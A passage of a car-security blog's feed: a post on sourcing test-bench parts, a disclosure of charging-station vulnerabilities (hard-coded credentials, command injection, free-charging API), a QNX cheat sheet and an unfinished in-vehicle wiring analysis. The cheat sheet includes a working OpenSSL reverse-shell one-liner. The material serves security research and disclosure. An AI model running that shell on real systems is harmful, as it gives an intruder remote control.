sometimes a specific part from a specific model. The requirements vary widely, which makes purchasing tricky. Below I share some experience.</p><p><img src="image-20220516011218127.png" alt="image-20220516011218127" style="zoom:50%;" /></p><h4 id="购买渠道"><a href="#购买渠道" class="headerlink" title="Where to Buy"></a>Where to Buy</h4><ul><li><p>Auto-parts markets</p><p>Auto-parts markets carry a wide variety of parts, but mostly mechanical ones aimed at the tuning trade. The advantage is that you can talk to people face to face, and prices are relatively low.</p><p>It is best to have someone who knows the place take you. A few years ago nobody at the Beijing auto-parts market would give us the time of day; whatever we asked for, the answer was "don't have it". By coincidence a colleague's Cantonese accent helped a lot: one shop owner recognized a fellow townsman and that is how we got a foot in the door. This time at Huadu people were much friendlier than in Beijing. That is also why I dragged a local along. It is a matter of circles, or perhaps there are plenty of connected parts here after all and we simply approached it the wrong way.<img src="640-16529689730673.jpeg" alt="img"></p></li><li><p>4S dealerships / repair shops</p><p>4S dealerships and repair shops get their stock from upstream suppliers, so part quality is high but prices are steep. They are also the hardest to deal with: our odd requests are usually turned down flat.</p></li><li><p>Xianyu</p><p>On Xianyu it comes down to luck. Most sellers are also auto-parts market stall owners, and technical questions mostly get the reply <strong>which part do you want, give me the part number, I don't know anything else</strong>. It is hard to find anyone with technical knowledge, so you go by volume and hope. Xianyu gathers sellers from all over the country, so there is more choice. But beware of scams: at the Huadu market, photographing shop fronts is not allowed, and the security guards there say many people photograph other people's shop fronts to run scams online. Many listings show a very low price with a note saying "message me if interested", and those usually end up quite expensive. Listings with a clearly marked price are better: one price, done. Still, haggle; if the asking price is high, open at half.</p><p><img src="640-16529689730674.jpeg" alt="img" style="zoom:25%;" /></p></li><li><p>Training-equipment manufacturers</p><p>Buying from manufacturers of automotive training equipment, who build teaching rigs by assembling salvaged parts. Advantages: good looking, mature products. Disadvantages: little customization and high prices.</p><p><img src="640-16529689730675.jpeg" alt="img"></p></li></ul><p><strong>Price, low to high</strong>: Xianyu -> auto-parts market -> training-equipment manufacturer -> 4S dealership / repair shop</p><p><strong>Degree of integration, high to low</strong>: training-equipment manufacturer -> auto-parts market -> Xianyu -> 4S dealership / repair shop</p><h4 id="叫法差异"><a href="#叫法差异" class="headerlink" title="Differences in Terminology"></a>Differences in Terminology</h4><p>When hunting for parts you want a <strong>TBOX</strong> and a <strong>head unit</strong>, but searching for those on Xianyu returns very little; offline, if you say TBOX, they will just stare at you: what is a TBOX? So you need to know the different names different fields use for the same part. Take the TBOX and the head unit as examples.</p><ul><li><p>The automotive trade usually calls the <code>TBOX</code> a <code>wireless terminal</code>, <code>emergency call module</code> and so on.</p></li><li><p>The automotive trade usually calls the <code>head unit (IVI)</code> a <code>navigation head unit</code>, <code>center display</code> and so on.</p></li></ul><p>Using the trade's terms instead of ours makes communicating with sellers easier and faster.</p><h4 id="难点"><a href="#难点" class="headerlink" title="Difficulties"></a>Difficulties</h4><p>Building a bench brings its own problems; I have summarized them below and offer some suggestions.</p><ol><li><strong>Wiring harness:</strong> for a more complex bench the harness becomes a tangle and is best left to a professional. We security people cannot do it because we lack harnesses, connectors and so on, let alone knowledge of connector pinouts and wiring. A bench with two or three parts we can manage; more parts, or the whole vehicle's electrics, are beyond us.</li><li><strong>Powering up</strong>: the parts themselves are easy to buy, but most come bare, so you have to wire them up and work out how to power them yourself. For a single TBOX or head unit, Dupont wires can stand in for the harness, and the power question can be answered by analyzing the hardware (working from the power-management chip).</li><li><strong>Connector pinouts:</strong> pinouts can be obtained in two ways: by manual analysis, identifying pins with a multimeter, logic analyzer and similar equipment (I will write a dedicated article on this later); or by looking them up, going to automotive repair sites and finding the wiring diagram for the model in question.</li><li><strong>Invoices:</strong> most sellers cannot issue invoices, so we have to find receipts elsewhere to cover the expense.</li><li><strong>App account:</strong> the bench needs to pair with the phone app so that control messages can be analyzed; for some brands' models, binding and activation can be arranged via Xianyu.</li></ol><h3 id="结语"><a href="#结语" class="headerlink" title="Closing Remarks"></a>Closing Remarks</h3><p>A test bench is essential for security research and demonstrations. For the client (the OEM) it may be a one-sentence request, but for us as the vendor it is a real challenge. The ultimate goal is a test bench built on the same idea as "DVWA".</p><p>I saw a seller on Xianyu offering custom test benches for connected-vehicle security research, which looks intriguing.</p><p><img src="image-20220516011003501.png" alt="image-20220516011003501"></p><p>Finally, feel free to share and exchange your parts-hunting experience.</p>]]></content>
<summary type="html"><p>I have recently been on a business trip to Guangzhou and took a walk around the Guangzhou Huadu (Kaitong) auto-parts market. For earlier research I had to put together a few test benches, and building a bench is a real headache, especially when it also has to carry vulnerabilities. Today I want to talk about a few things I have learned about buying test parts.</p>
<h3 id="汽车界”华强北”一日游"><a href="#汽车界”华强北”一日游" class="h</summary>
<category term="Automotive" scheme="http://delikely.github.io/tags/Automotive/"/>
</entry>
<entry>
<title>Charging Station Vulnerability Hunting in Practice</title>
<link href="http://delikely.github.io/2022/04/29/chargebox-vuln-hunter-garo-and-bender/"/>
<id>http://delikely.github.io/2022/04/29/chargebox-vuln-hunter-garo-and-bender/</id>
<published>2022-04-29T11:47:40.000Z</published>
<updated>2022-05-19T13:50:00.000Z</updated>
<content type="html"><![CDATA[<p>Six months ago I wrote an overview article, <a href="https://delikely.github.io/2021/10/20/Charging-infrastructure/">Connected-Vehicle Security Basics: Charging Infrastructure</a>, describing the structure of charging networks and their security threats. While writing it I studied several foreign charging stations and found 5 high-severity vulnerabilities, reported them to the relevant parties and helped with the fixes. Bender has recently finished handling them and published an advisory, so now I can share some of the vulnerabilities.</p><h3 id="寻找研究对象"><a href="#寻找研究对象" class="headerlink" title="Finding Research Targets"></a>Finding Research Targets</h3><p>While looking for research targets I found that quite a few foreign charging stations have their own IP addresses and are exposed on the public internet, whereas domestic ones rarely are, so I chose foreign stations. Charging-station locator sites list many stations, but they are mostly organized by operator, so you cannot identify the manufacturer.</p><p><img src="image-20220428143421195.png" alt="image-20220428143421195"></p><p>So I tried a different approach and looked at charging alliances to see which companies manufacture and operate stations. Fortunately, I soon came across Ebee (a Bender subsidiary).<img src="image-20220428144305061.png" alt="image-20220428144305061"></p><p>The table above fixed the scope; next I needed specific models. Research requires the firmware, and for some stations it is hard to obtain, so in the end I settled on two targets based on how easy the firmware was to get: Ebee (Bender) and Garo AB. Both share the two characteristics needed for remote research: reachable from the public internet, and firmware available. GARO is not in the alliance above; later I describe how we found GARO through a supply-chain relationship and started researching it.</p><blockquote><p>Bender was founded in 1946, is headquartered in Germany and specializes in residual-current protection for low-voltage systems. It entered the mainland Chinese market as early as the 1980s. Its products are used in electric and hybrid vehicles, energy generation and distribution, renewable energy, building technology and many other industrial fields. Ebee, a Bender subsidiary, focuses on developing charge controllers and supplies them to charging stations of several brands.</p></blockquote><blockquote><p>The Garo AB group was founded in 1939 and is headquartered in Sweden. It focuses on new energy and was listed on Nasdaq in 2016.</p></blockquote><h3 id="Bender-CC系列充电控制器存在多个漏洞"><a href="#Bender-CC系列充电控制器存在多个漏洞" class="headerlink" title="Multiple Vulnerabilities in Bender CC-Series Charge Controllers"></a>Multiple Vulnerabilities in Bender CC-Series Charge Controllers</h3><p><img src="Laderegler-Produktgruppe.jpg" alt="img"></p><p>The Ebee CC-series charge controller is the core component of charging stations from GARO, ENSTO, Bender and others. The charge controller is the brain of the station: upward it connects to the cloud service for remote control, downward it connects to the electrical equipment and manages charging with the vehicle.</p><blockquote><p>The charge controller monitors the hardware inside the charging system, such as meters, user-interface boards or sockets. Its compact design and size make the charging system smart, small and cheaper. A backend system is required for the charge controller to communicate. Since most backend vendors strictly adhere to the Open Charge Point Protocol (OCPP), the charge controller is OCPP 1.5 and OCPP 1.6 compatible. All messages specified in OCPP are supported, plus some vendor-specific extensions based on DataTransfer messages. Integration tests with vendor backends such as Vattenfall, Bosch, NTT and DRIIVZ have been carried out successfully. The charge controller can run as a system permanently connected to the mobile network; it supports 2.5G and 4G UMTS mobile networks. Online operation requires a SIM card (not included). An RFID module with an RFID reader and LEDs allows convenient user interaction: charging is started by holding a valid RFID card near the reader. In offline operation the charge controller can charge freely without authorization, or authorize locally whitelisted users based on RFID and authorized RFID cards.</p></blockquote><p>Ebee's website does not offer the firmware, so using the station's fingerprint we found another vendor that uses the CC612; its firmware could be downloaded and it also provides some development documentation, which was a great help during our research.</p><h4 id="CVE-2021-34601"><a href="#CVE-2021-34601" class="headerlink" title="CVE-2021-34601"></a><a href="https://cert.vde.com/en/advisories/VDE-2021-047/#cvedetails-CVE-2021-34601">CVE-2021-34601</a></h4><p>The firmware contains hard-coded SSH credentials, but the user only has ordinary privileges. CVE-2021-34602 can be used to escalate privileges.</p><p><img src="image-20220428145929244.png" alt="image-20220428145929244"></p><p><a href="https://cert.vde.com/en/advisories/VDE-2021-047/#cvedetails-CVE-2021-34602">CVE-2021-34602</a></p><p>After logging in with the hard-coded credentials from CVE-2021-34601, we found the web backend's account and password stored in plaintext, readable even by an ordinary user. After logging in to the backend we found a command-injection vulnerability.</p><p><img src="image-20220428150416046.png" alt="image-20220428150416046"></p><h3 id="GARO-存在多个漏洞"><a href="#GARO-存在多个漏洞" class="headerlink" title="Multiple Vulnerabilities in GARO"></a>Multiple Vulnerabilities in GARO</h3><p>We looked into this because the Ebee issue affected the Garo A8 station, but during verification we found that GARO's other models were not affected; notably, some stations' web backends had no authentication at all. While browsing the management backend we obtained the firmware from the software-upgrade page.</p><p>The WiFi module used by the GARO Wallbox GLB/GTB/GTC (which also acts as the main controller, the TCU) is based on a Raspberry Pi.</p><p><img src="image-20220428154315145.png" alt="image-20220428154315145"></p><p>Multiple vulnerabilities were found in GARO and three CVE IDs were assigned: CVE-2021-45876, CVE-2021-45877 and CVE-2021-45878.</p><blockquote><h4 id="1-Without-Authentication-CVE-2021-45878"><a href="#1-Without-Authentication-CVE-2021-45878" class="headerlink" title="1. Without Authentication(CVE-2021-45878)"></a>1. Without Authentication(CVE-2021-45878)</h4><p>Lack of access control on the web manager pages allows any user to view and modify information.</p><h4 id="2-Hard-Coded-Credentials-for-Tomcat-Manager-CVE-2021-45877"><a href="#2-Hard-Coded-Credentials-for-Tomcat-Manager-CVE-2021-45877" class="headerlink" title="2. Hard Coded Credentials for Tomcat Manager(CVE-2021-45877)"></a>2. Hard Coded Credentials for Tomcat Manager(CVE-2021-45877)</h4><p>A hard-coded credential in <code>/etc/tomcat8/tomcat-user.xml</code> allows attackers to gain authorized access and take complete control of Tomcat; the account cannot be modified or deleted by a normal user.</p><h4 id="3-Unauthenticated-Command-Injection-CVE-2021-45876"><a href="#3-Unauthenticated-Command-Injection-CVE-2021-45876" class="headerlink" title="3. Unauthenticated Command Injection(CVE-2021-45876)"></a>3. Unauthenticated Command Injection(CVE-2021-45876)</h4><p>The <code>url</code> parameter of the <code>downloadAndUpdate</code> function is vulnerable to command injection: unfiltered user input is used to build a command that is executed when downloading new firmware.</p></blockquote><p>Of particular note, an unauthenticated user can call the <code>/freecharge</code> API to charge for free.</p><p><img src="image-20210919170834915.png" alt="image-20210919170834915"></p><h3 id="供应链安全"><a href="#供应链安全" class="headerlink" title="Supply-Chain Security"></a>Supply-Chain Security</h3><h4 id="ebbe-充电桩控制器漏洞影响面"><a href="#ebbe-充电桩控制器漏洞影响面" class="headerlink" title="Impact of the Ebee Charge Controller Vulnerabilities"></a>Impact of the Ebee Charge Controller Vulnerabilities</h4><p>According to the Ebee website, the CC612 charge controller belongs to the Bender group.</p><p><img src="image-20210717101441288.png" alt="image-20210717101441288"></p><p>The firmware reveals that, besides the user-facing pages, there are hidden management pages: an operator page (/operator), a manufacturer page (/manufacturer) and a developer page (/dev).</p><p><img src="image-20220428151537682.png" alt="image-20220428151537682"></p><p>Using these hidden pages as a fingerprint of the station's web backend, the affected stations were confirmed to include:</p><ul><li>Garo A8</li><li>Bender GmbH Co. KG CC612_2S0R</li><li>Chago(ENSTO) EVB100</li><li>etc</li></ul><h4 id="GARO-log4j漏洞影响"><a href="#GARO-log4j漏洞影响" class="headerlink" title="GARO and the log4j Vulnerability"></a>GARO and the log4j Vulnerability</h4><p>The GARO Wallbox GLB/GTB/GTC uses the log4j component. When the log4j vulnerability was disclosed we checked the station; it turned out not to be affected, but the software supply chain in the charging sector still deserves attention.</p><p><img src="image-20220428155427689.png" alt="image-20220428155427689"></p><h4 id="漏洞管理"><a href="#漏洞管理" class="headerlink" title="Vulnerability Management"></a>Vulnerability Management</h4><p>As a charge-controller supplier, a vulnerability in an Ebee product affects every charging station that uses that controller. This is the <strong>closed-source software</strong> supply-chain problem.</p><p>The impact of log4j was enormous, yet determining whether your own product is affected is a hard question. This is the <strong>open-source software</strong> supply-chain problem.</p><p>Hunting these charging-station vulnerabilities made us realize how deeply <strong>open- and closed-source software supply chains</strong> affect connected-vehicle security. To address software supply-chain security in connected vehicles we will soon launch a <strong>connected-vehicle vulnerability management (collaboration) platform</strong>; stay tuned.</p><h3 id="收到致谢"><a href="#收到致谢" class="headerlink" title="Acknowledgement"></a>Acknowledgement</h3><p>The advisory jointly published by BENDER/EBEE and CERT@VDE acknowledges <strong>QiAnXin Xingyu Lab (奇安信星舆实验室)</strong>.</p><p><img src="image-20220428153411278.png" alt="image-20220428153411278"></p><h3 id="相关连接"><a href="#相关连接" class="headerlink" title="Related Links"></a>Related Links</h3><ul><li><a href="https://cert.vde.com/en/advisories/VDE-2021-047/">VDE-2021-047 | CERT@VDE</a></li><li><a href="https://delikely.github.io/2021/10/20/Charging-infrastructure/">Connected-Vehicle Security Basics: Charging Infrastructure</a></li><li><a href="https://github.com/delikely/advisory/tree/main/Bender">Multiple Vulnerabilities in Bender/Bee Charge Controller</a></li><li><a href="https://github.com/delikely/advisory/tree/main/GARO">Multiple Vulnerabilities in GARO Wallbox</a></li></ul>]]></content>
<summary type="html"><p>Six months ago I wrote an overview article, <a href="https://delikely.github.io/2021/10/20/Charging-infrastructure/">Connected-Vehicle Security Basics: Charging Infrastructure</a>, describing the structure of charging networks and their security threats. While writing it I studied</summary>
<category term="Automotive" scheme="http://delikely.github.io/tags/Automotive/"/>
</entry>
<entry>
<title>Connected-Vehicle Security Basics: QNX Command Cheatsheet</title>
<link href="http://delikely.github.io/2022/02/28/QNX-Command-Cheatsheet/"/>
<id>http://delikely.github.io/2022/02/28/QNX-Command-Cheatsheet/</id>
<published>2022-02-28T15:15:00.000Z</published>
<updated>2022-02-28T16:03:22.819Z</updated>
<content type="html"><![CDATA[<h2 id="QNX-命令备忘录"><a href="#QNX-命令备忘录" class="headerlink" title="QNX Command Cheat Sheet"></a>QNX Command Cheat Sheet</h2><blockquote><p>QNX is a microkernel-based Unix-like real-time operating system owned by the Canadian company RIM. It is known for its safety and real-time properties and is aimed mainly at embedded systems. QNX has a large share of the automotive market; most car makers use it, mostly as the underlying OS of head units and instrument clusters.</p></blockquote><p>Lately I have noticed many people researching QNX head units, some of them touching QNX for the first time, and I expect more and more people will encounter it. Because QNX is a POSIX-compliant Unix-like real-time OS, basic operation is not hard to pick up, but some commands differ from the Linux everyone knows. I have been working on QNX myself recently and hit quite a few pitfalls, so I put together a QNX command cheat sheet. This is the first version, V0.1; it probably has plenty of gaps, and feedback is welcome.</p><h3 id="QNX-Trick"><a href="#QNX-Trick" class="headerlink" title="QNX Trick"></a>QNX Trick</h3><p>Here are three of the more interesting commands from the QNX Command Cheat Sheet.</p><ol><li><p>use</p><p>There is a saying on Linux: when in trouble, ask the "man". It means that when you do not know what a command does or how to use it, you normally run man to get help. On QNX, however, not only is there no man, but -h/--help does nothing for most commands either. So how do you get help on QNX? use is QNX's -h/--help. When you forget how a command works, run <code>use command</code> (replacing command with the one you want to look up) to get its help text.</p></li><li><p>Finding the process that owns a port</p><p>On QNX <code>netstat</code> has no <code>-p</code> option, so <code>netstat -p</code> is of no use. How do you look it up, then? So far I have found two commands, <code>sockstat</code> and <code>pidin</code>, that can do it. Both <code>sockstat</code> and <code>pidin fds</code> below show that port 8000 is held by the qconn program.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># sockstat</span></span><br><span class="line">USER NODE:CMD PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS</span><br><span class="line">root dhcp.clien 135187 3 udp *.* *.*</span><br><span class="line">root qconn 184342 3 tcp *.8000 *.*</span><br><span class="line">root inetd 200729 4 tcp *.ftp *.*</span><br><span class="line">root inetd 200729 5 tcp *.telnet *.*</span><br></pre></td></tr></table></figure><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># pidin fds</span></span><br><span class="line"> 184342 usr/sbin/qconn </span><br><span class="line">true 0 1 </span><br><span class="line">true 1 4103 rw 0 /dev/con1</span><br><span class="line">true 2 4103 rw 0 /dev/con1</span><br><span class="line">true 3 102414 rw 0 I4TCP *.8000 *.* LISTEN</span><br><span class="line">true 4 184342 </span><br><span class="line">true 0s 1 </span><br><span class="line">true 2s 1 MP 0 /dev/dbgmem</span><br><span class="line">true 4s 1 MP 0 /dev/profiler</span><br><span class="line"></span><br></pre></td></tr></table></figure></li><li><p>Reverse Shell</p><p>Getting a reverse shell on QNX is constrained: in most cases there is no nc/netcat, no busybox, and not even the usual download tools wget and curl. Being able to run arbitrary commands yet not get a reverse shell is maddening. Is there a universal method? I did find a little-known one, which I share here; it works on both Linux and QNX.</p><p>With security getting more attention, OpenSSL is very widely deployed. It is a fine tool that lowers the bar for using encryption. It is usually used for encryption and decryption, and few notice that it can also do network communication. OpenSSL's s_client is an SSL/TLS client, the counterpart of s_server; it can talk not only to s_server but to any other service that speaks SSL/TLS. This property can be used to build a reverse shell.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># listener</span></span><br><span class="line">openssl s_server -quiet -key server.key -cert server.pem -port 4444 </span><br><span class="line"><span class="comment"># target side </span></span><br><span class="line">mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.7.1:4444 > /tmp/s; rm /tmp/s </span><br></pre></td></tr></table></figure><h3 id="Command-Cheat-Sheet"><a href="#Command-Cheat-Sheet" class="headerlink" title="Command Cheat Sheet"></a>Command Cheat Sheet</h3><p>For more, download the <a href="https://github.com/delikely/Wiki/blob/main/cheatsheet/QNX/QNX Command Cheatsheet V0.1.png">QNX Command Cheat Sheet</a> and enjoy.</p><p><img src="QNX-Command-Cheatsheet.png" alt="QNX Command cheatsheet"></p></li></ol><h3 id="参考"><a href="#参考" class="headerlink" title="References"></a>References</h3><ul><li><a href="http://www.qnx.com/developers/docs/6.5.0/index.jsp?topic=%2Fcom.qnx.doc.neutrino_utilities%2Fabout.html&cp=13_12_0">Utilities Reference</a></li><li><a href="https://devhints.io/adb">devhints.io</a></li></ul>]]></content>
<summary type="html"><h2 id="QNX-命令备忘录"><a href="#QNX-命令备忘录" class="headerlink" title="QNX Command Cheat Sheet"></a>QNX Command Cheat Sheet</h2><blockquote>
<p>QNX is owned by the Canadian company RIM and is a microkernel-based Unix-like</summary>
<category term="Automotive" scheme="http://delikely.github.io/tags/Automotive/"/>
</entry>
<entry>
<title>Connected-Vehicle Security Basics: Analyzing the In-Vehicle Network Structure from Wiring Connectors</title>
<link href="http://delikely.github.io/2021/11/18/Vehicle-Cable-Connection-Terminal/"/>
<id>http://delikely.github.io/2021/11/18/Vehicle-Cable-Connection-Terminal/</id>
<published>2021-11-19T02:14:59.000Z</published>
<updated>2021-11-20T04:33:24.475Z</updated>
<content type="html"><![CDATA[<h3 id="前言"><a href="#前言" class="headerlink" title="Preface"></a>Preface</h3><p>The lab plans to tear down a car soon to study how a vehicle is put together. Taking a car apart is easy; putting it back together exactly as it was so that it still runs takes skill. I happened to get hold of a complete wiring diagram for one vehicle, so I decided to study it in preparation for the teardown, to avoid being lost when the time comes. I have reverse-engineered connectors before, hunting for CAN, UART, USB and other interfaces among a pile of pins; without a manual, a complete reverse is fairly hard. Knowing the connectors on each ECU and harness also helps when building your own test bench. So follow me inside the car and take a look at the ECU connectors.</p><h3 id="插线端子"><a href="#插线端子" class="headerlink" title="Connectors"></a>Connectors</h3><p>Looking at the in-vehicle network through its connectors: downward, how each ECU connects to other ECUs or sensors and what communication scheme it uses; upward, which network domain each ECU sits in, to map out the vehicle's network structure.</p><p>Below, grouped by network, I explain the purpose of each ECU's connector pins, and finally draw the whole-vehicle topology with the CAN networks as the backbone.</p><h4 id="网关"><a href="#网关" class="headerlink" title="Gateway"></a>Gateway</h4><p>The gateway is the core of the whole network, handling and forwarding all kinds of messages across multiple CAN buses and Ethernet. Its most important function is isolating the network domains. Judging from the gateway connector, the internal CAN network is divided into 6 buses: DiagBUS (diagnostics) CAN, TBUS (telematics) CAN, CBUS (chassis) CAN, EBUS (body) CAN, IBUS (infotainment) CAN and EVBUS (energy) CAN. The in-vehicle network is analyzed below along these 6 buses.</p><p><img src="image-20211111230110482.png" alt="image-20211111230110482"></p><h4 id="TBUS-远程诊断网络"><a href="#TBUS-远程诊断网络" class="headerlink" title="TBUS Remote Diagnostics Network"></a>TBUS Remote Diagnostics Network</h4><p>The TBUS carries only one ECU, the T-BOX. The T-BOX is one of the core components of the connected vehicle, integrating GPS, external communication interfaces, an electronic processing unit, a microcontroller, a mobile communication unit and storage. It provides network access, OTA, remote control, location query/vehicle tracking, battery management, location alerts, eCall, remote diagnostics, platform monitoring/national supervision and more. The connector in the figure below has CAN, SPK, MIC and wake-up signal pins, among others. The T-BOX connects to the gateway over TBUS CAN; its SPK (speaker) and MIC (microphone) serve <a href="https://delikely.github.io/2021/08/15/TBOX-Main-Function/#eCall">emergency call</a> and similar services. Beyond the pins shown, T-BOXes in other vehicles may also have a USB terminal used for Ethernet emulation, a UART serial port for debugging and so on.</p><p><img src="image-20211111225448841.png" alt="image-20211111225448841"></p><h4 id="EVBUS-能量域-动力域"><a href="#EVBUS-能量域-动力域" class="headerlink" title="EVBUS Energy Domain / Powertrain Domain"></a>EVBUS Energy Domain / Powertrain Domain</h4><p>"Energy domain" is the new-energy-vehicle name for what a conventional network calls the powertrain domain. Its main functions are charging the traction battery and controlling the drive motor to power the vehicle. It contains the BMS battery management system, the MCU drive motor controller, the OBC on-board charger, the CMU AC charging control unit, the electric water pump controller and others.</p><h5 id="BMS-电池管理、快充、慢充系统"><a href="#BMS-电池管理、快充、慢充系统" class="headerlink" title="BMS Battery Management, Fast Charging and Slow Charging"></a>BMS Battery Management, Fast Charging and Slow Charging</h5><p>An electric vehicle's power comes from its battery, and the BMS (Battery Management System) is at its heart, controlling charging and discharging and estimating battery state. The BMS is tightly coupled to the traction battery: it monitors it in real time through temperature sensors and handles thermal management, and over the EVBUS it communicates in real time with the vehicle controller, motor controller, energy control system, on-board display and so on. There are two charging modes, fast charging (DC) and slow charging (AC). On the fast-charging network the BMS acts as the gateway between EVBUS and FCBUS; on the slow-charging network the BMS controls slow charging of the battery through the CMU.</p><p><img src="image-20211112110531547-16367183183121.png" alt="image-20211112110531547"></p><h5 id="WEP-FD-电机水泵控制器"><a href="#WEP-FD-电机水泵控制器" class="headerlink" title="WEP-FD Motor Water Pump Controller"></a>WEP-FD Motor Water Pump Controller</h5><p>The motor water pump controller drives the water pump that provides coolant circulation and air cooling for the motor and its electronics; it joins the energy domain over the CAN bus.</p><p><img src="image-20211112104532040.png" alt="image-20211112104532040" style="zoom:50%;" /></p><h4 id="CBUS-底盘域"><a href="#CBUS-底盘域" class="headerlink" title="CBUS Chassis Domain"></a>CBUS Chassis Domain</h4><p>The chassis domain coordinates the whole chassis system, that is, it has overall control of vehicle motion. Controllers on the chassis CAN include the ABS anti-lock braking system, EPB electronic parking brake controller, EPS electric power steering, P-gear controller, ESK gear selector and VBP vacuum pump controller.</p><h5 id="ABS-防抱死制动系统"><a href="#ABS-防抱死制动系统" class="headerlink" title="ABS Anti-lock Braking System"></a>ABS Anti-lock Braking System</h5><p>The ABS (Antilock Brake System) automatically regulates braking force during braking so that the wheels do not lock but keep rolling while slipping (slip ratio around 20%), keeping tire-road adhesion at its maximum. It reads the speed sensors on all four wheels and modulates brake force to prevent lock-up.</p><p><img src="image-20211112115057877.png" alt="image-20211112115057877"></p><h5 id="EPB-电子驻车制动控制器"><a href="#EPB-电子驻车制动控制器" class="headerlink" title="EPB Electronic Parking Brake Controller"></a>EPB Electronic Parking Brake Controller</h5><p>The EPB (Electrical Park Brake), commonly called the electronic handbrake, applies the parking brake under electronic control. It parks the vehicle by driving four EPB motors.</p><p><img src="image-20211112113135506.png" alt="image-20211112113135506"></p><h5 id="EPS-电动助力转向系统"><a href="#EPS-电动助力转向系统" class="headerlink" title="EPS Electric Power Steering"></a>EPS Electric Power Steering</h5><p>EPS (Electric Power Steering) is a power-steering system in which an electric motor supplies the assist torque, according to driver intent and vehicle operating conditions. Its control is the integrated control of the steering system, and it communicates with other controllers over the chassis CAN.</p><p><img src="image-20211112113631841.png" alt="image-20211112113631841"></p><h5 id="P-档控制器"><a href="#P-档控制器" class="headerlink" title="P-Gear Controller"></a>P-Gear Controller</h5><p>The P-gear control on an electric vehicle serves the same purpose as the "park" position of a conventional automatic transmission.</p><p><img src="image-20211112114605397.png" alt="image-20211112114605397"></p><h5 id="ESK-档位控制器"><a href="#ESK-档位控制器" class="headerlink" title="ESK Gear Selector"></a>ESK Gear Selector</h5><p>The rotary electronic gear selector switches between D, R, N, S, L and other gears.</p><p><img src="image-20211112111732143.png" alt="image-20211112111732143" style="zoom:50%;" /></p><h5 id="VBP-真空泵控制器"><a href="#VBP-真空泵控制器" class="headerlink" title="VBP Vacuum Pump Controller"></a>VBP Vacuum Pump Controller</h5><p>The vacuum pump generates vacuum; the negative pressure is used to boost braking force.</p><p><img src="image-20211112112301791.png" alt="image-20211112112301791" style="zoom:67%;" /></p><h4 id="IBUS-信息域-智能座舱域"><a href="#IBUS-信息域-智能座舱域" class="headerlink" title="IBUS Infotainment Domain / Smart Cockpit Domain"></a>IBUS Infotainment Domain / Smart Cockpit Domain</h4><p>The smart cockpit is a large part of what makes an intelligent connected vehicle "intelligent". It includes the center-console entertainment system, instrument cluster, air-conditioning comfort system, low-speed pedestrian warning device and more.</p><h5 id="中控娱乐系统"><a href="#中控娱乐系统" class="headerlink" title="Center-Console Entertainment System"></a>Center-Console Entertainment System</h5><p>The center-console panel may be traditional push-button or more modern electronic. The air conditioning is controlled from the panel's buttons, and the panel relays the command to the AC controller over the IBUS.</p><p><img src="image-20211112122759622.png" alt="image-20211112122759622"></p><h5 id="音响主机C"><a href="#音响主机C" class="headerlink" title="Audio Head Unit"></a>Audio Head Unit</h5><p>The audio head unit is also called the head unit, IVI, center-console host and so on; it connects to control buttons, speakers, microphone, camera and more.</p><p><img src="image-20211112123726218.png" alt="image-20211112123726218"></p><h5 id="组合仪表"><a href="#组合仪表" class="headerlink" title="Instrument Cluster"></a>Instrument Cluster</h5><p>The instrument cluster receives driving and other status data over the IBUS and displays it. The cluster and the head unit are both in the smart cockpit domain and can talk to each other directly without going through the gateway.</p><p><img src="image-20211112124106173.png" alt="image-20211112124106173"></p><h5 id="ACP-空调控制器"><a href="#ACP-空调控制器" class="headerlink" title="ACP Air-Conditioning Controller"></a>ACP Air-Conditioning Controller</h5><p>The AC controller receives AC control messages on the IBUS and drives heating or cooling, with various sensors for monitoring.</p><p><img src="image-20211112120425461.png" alt="image-20211112120425461"></p><h5 id="EAS-电动压缩机控制器"><a href="#EAS-电动压缩机控制器" class="headerlink" title="EAS Electric Compressor Controller"></a>EAS Electric Compressor Controller</h5><p>The AC controller commands the EAS compressor driver over CAN to heat or cool.</p><p><img src="image-20211112121243656.png" alt="image-20211112121243656"></p><h5 id="PTC-电加热控制"><a href="#PTC-电加热控制" class="headerlink" title="PTC Electric Heater Control"></a>PTC Electric Heater Control</h5><p>The PTC heater controller is commanded over CAN to regulate temperature.</p><p><img src="image-20211112121443053.png" alt="image-20211112121443053"></p><h5 id="低速行人警示器"><a href="#低速行人警示器" class="headerlink" title="Low-Speed Pedestrian Warning Device"></a>Low-Speed Pedestrian Warning Device</h5><p>Because a battery-electric vehicle is relatively quiet at low speed, nearby pedestrians have trouble noticing it. To improve safety, this system emits a warning sound when speed is below 30 km/h so that pedestrians are more aware of it.</p><p><img src="image-20211112122140688.png" alt="image-20211112122140688"></p><h4 id="EBUS-车身域"><a href="#EBUS-车身域" class="headerlink" title="EBUS Body Domain"></a>EBUS Body Domain</h4><p>The body domain covers body accessory control (windows, door locks), interior and exterior trim control (sunroof, wipers, interior and exterior lights), start control, digital key and more. Its main modules are the BCM body control module, PEPS push-button start and keyless entry, TPMS tire-pressure monitoring, PAS parking-assist radar, AVM around-view camera module, SDM airbag controller, ESCL steering column lock and DVR dash camera.</p><p>Characteristics of the body domain control system:</p><ul><li>Spans many areas and personal settings, such as seat position memory and voice control of windows;</li><li>Involves many systems and exchanges information with most other systems in the vehicle: powertrain, entertainment and so on;</li><li>Involves functional safety: low-beam control (ASIL B), front wiper control (ASIL B), vehicle power-state management (ASIL B), window anti-pinch (ASIL A).</li><li>Involves highly user-visible functions: it is critical, affecting vehicle start and user entry, and window and light controls are used constantly.</li></ul><p>The body domain spans several technical fields, has many interface types, and its resource needs vary widely between models; it also involves functional safety and highly visible functions, so reliability requirements are high; and it involves wireless technologies such as PEPS, TPMS, Bluetooth and NFC.</p><h5 id="BCM-车身控制模块"><a 